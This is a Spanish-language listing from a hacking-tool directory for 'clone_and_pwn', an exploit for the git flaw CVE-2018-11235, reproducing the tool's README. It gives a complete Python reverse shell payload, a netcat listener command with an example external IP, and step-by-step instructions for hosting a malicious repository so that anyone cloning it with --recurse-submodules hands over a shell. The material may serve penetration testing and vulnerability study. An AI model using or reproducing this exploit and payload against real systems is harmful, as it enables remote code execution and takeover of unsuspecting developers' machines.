Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
clone_and_pwn — Exploits de CVE-2018-11235 | Kitploit
Herramientas/GitHubGitHub/h0k5/clone_and_pwn
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubh0k5/clone_and_pwn

clone_and_pwn

Exploits de CVE-2018-11235

Ver Repositorio
12hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Encabezados

Título del Exploit: Clone and Pwn
Fecha: 4 de junio de 2018
Autor del Exploit: Alejandro Caceres
Página del proveedor: https://git-scm.com/
Enlace del software: https://git-scm.com/downloads
Versión: se ejecuta código arbitrario en versiones del cliente git anteriores a 2.13.7, 2.14.x anteriores a 2.14.4, 2.15.x anteriores a 2.15.2, 2.16.x anteriores a 2.16.4 y 2.17.x anteriores a 2.17.1
Probado en: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235

Uso del exploit para CVE-2018-11235

CVE-2018-11235, denominado aquí clone and pwn, crea un repositorio git malicioso que explota un error en git. Cuando el repositorio se clona usando la opción --recurse-submodules, se ejecuta código arbitrario en versiones del cliente git anteriores a 2.13.7, 2.14.x anteriores a 2.14.4, 2.15.x anteriores a 2.15.2, 2.16.x anteriores a 2.16.4 y 2.17.x anteriores a 2.17.1.

Para usar este módulo, simplemente colócalo en un servidor con acceso directo a Internet (p. ej., AWS, Digital Ocean) y abre evil.sh. Se verá algo como lo siguiente:

root@kitploit:~
#!/usr/bin/python

EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080

#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Establece EXTERN_IP y EXTERN_PORT a la IP (externa) y el puerto en los que deseas recibir tu reverse shell. Puedes recibir una reverse shell con algo como:

nc -l <EXTERN_IP> EXTERN_PORT p. ej.

Descargar herramienta
nc -l 193.23.23.32 8080

O con el módulo genérico de shell de Metasploit. Una vez que el usuario haya ejecutado el comando git clone --recurse-submodules git://<your ip>/repo dest_dir, recibirás una reverse shell.

Si tienes problemas para ejecutarlo varias veces (o después de un intento fallido), comprueba lo siguiente:

  • Ejecuta ./clean.sh; ten en cuenta que esto eliminará todos los datos en /tmp
  • revisa los procesos con ps aux | grep git para asegurarte de que no estés ya ejecutando gitdaemon. Mata cualquier proceso de gitdaemon.

Agradecimientos

Código derivado del git patch de @peff (busca el archivo de prueba t/t7415-submodule-names.sh).

Por lo tanto, este repositorio se publica bajo la GNU General Public License versión 2.

Corrección adicional para versiones antiguas de git cortesía de @atorralba (detalles en esta publicación).

Este script está adaptado de https://github.com/Rogdham/CVE-2018-11235, con mucho cariño y reconocimiento

=======

clone_and_pwn

Explota CVE-2018-11235

Por @_hyp3ri0n y @mehaase